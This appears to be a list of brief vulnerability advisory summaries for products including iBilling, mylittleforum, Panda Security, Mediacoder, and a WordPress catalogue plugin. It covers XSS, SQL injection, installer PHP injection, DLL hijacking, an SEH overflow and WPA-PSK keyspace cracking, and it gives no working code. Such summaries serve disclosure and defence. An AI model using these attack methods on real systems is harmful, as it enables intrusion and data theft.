iBilling suffers from multiple cross-site scripting vulnerabilities. The issue is triggered when input passed via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
When setting up mylittleforum CMS users will have to walk thru an installation script and provide details for the application like the forums email address, name, admin email, admin password, database name etc... However, no input validation / checks exists for that installation script. Low privileged users can then supply arbitrary PHP code for the Database Name. The PHP command values will get written to the config/db_settings.php file and processed by the application. Since we supply an invalid Database Name a MySQL error will be thrown but the injected PHP payload will also be executed on the host system. If the CMS is installed by low privileged user and that user has basic MySQL database authorization to run the install for the CMS it can result in a privilege escalation, remote command execution and complete takeover of the host server.
Multiple Panda Security products are vulnerable to local privilege escalation. As the USERS group has write permissions over the folder where the PSEvents.exe process is located, it is possible to execute malicious code as Local System. A malicious user can exploit this vulnerability by creating a malicious DLL file in that directory and name it as one of the missing DLLs. After one hour, the “PSEvents.exe” proces will be executed and the malicious DLL will be loaded.
Kagao v3.0 - Professional Classified Market is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to access or modify data in the back-end database, compromise the application, access or modify sensitive data, or exploit various other vulnerabilities. Cross-site scripting (XSS) vulnerabilities exist in the application due to the failure to properly sanitize user-supplied data before using it in the application's dynamic content. An attacker can exploit these issues to execute arbitrary HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, and to control how the site is rendered to the user; other attacks are also possible.
Mediacoder 0.8.43.5830 is vulnerable to a buffer overflow SEH exploit. The vulnerability is triggered when a specially crafted .m3u file is opened. The exploit uses a nop sled and shellcode to execute a calc.exe payload. The SEH handler is located at 0x64f03994 in swscale-3.dll.
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system directly, for example APIs, files, upload utilities, device settings, etc.
The Reply and search functionalities are both vulnerable to Stored XSS due to improper filtration in displaying the content of replies. Steps to reproduce the vulnerability include logging into an account, looking for any topic and adding a reply with a widely used common keyword within XSS payload, and then having any user surfing the topic and searching for specific keywords, which will cause the JavaScript code to be executed.
The Tesley CPVA 642 routers supplied by Magnet Networks are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker. The WPA-PSK pass phrase has the following features: Starts with MAGNET0, Adds six random numerical digits, 1 million possible combinations ( MAGNET0000000 – MAGNET0999999 ). The entire keyspace can be generated using “mask processor” by ATOM, piping each letter out to its own file. Using a 1.4ghz i3 processor on a budget laptop, we were hitting 1,000 keys per second. The WPA-PSK handshake we used has the password MAGNET0349325 and was cracked within ~6 minutes.
A SQL injection vulnerability exists in OPAC KpwinSQL, which allows an attacker to inject malicious SQL queries via the 'detail_num' parameter in the 'zaznam.php' file. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
An arbitrary file upload web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below. The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory if the plugin is premium version and the remote attacker have an especific account (contributor|editor|author|administrator) who can manage this plugin.
Services By CQR